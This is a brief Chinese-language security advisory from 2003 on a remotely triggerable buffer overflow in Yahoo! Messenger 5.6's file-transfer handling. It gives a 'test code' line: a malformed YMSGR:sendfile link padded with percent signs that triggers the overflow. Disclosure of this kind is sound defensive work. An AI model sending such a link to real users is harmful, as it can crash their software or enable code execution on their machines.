Yahoo! Messenger文件传送缓冲区溢出漏洞发布时间:2003-10-27 更新时间:2003-10-27 严重程度:高 威胁程度:普通用户访问权限 错误类型:边界检查错误 利用方式:服务器模式 BUGTRAQ ID:8894 受影响系统 Yahoo! Messenger 5.6详细描述 Yahoo! Messenger实现上存在一个可远程利用的缓冲溢出漏洞,攻击者通过发送一个畸形的sendfile请求并使受害者接受以后触发此溢出。溢出发生后通常导致内存访问错误,理论上也有可能利用此漏洞执行任意指令,此漏洞也可以通过一个恶意的sendfile链接来诱使用户触发。 测试代码 YMSGR:sendfile? [victim_yahooID]+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%&c%c:\[somefile] 解决方案 厂商还未提供解决方案。 相关信息 Buffer Overflow in Yahoo messenger Client http://online.securityfocus.com/archive/1/342472 |
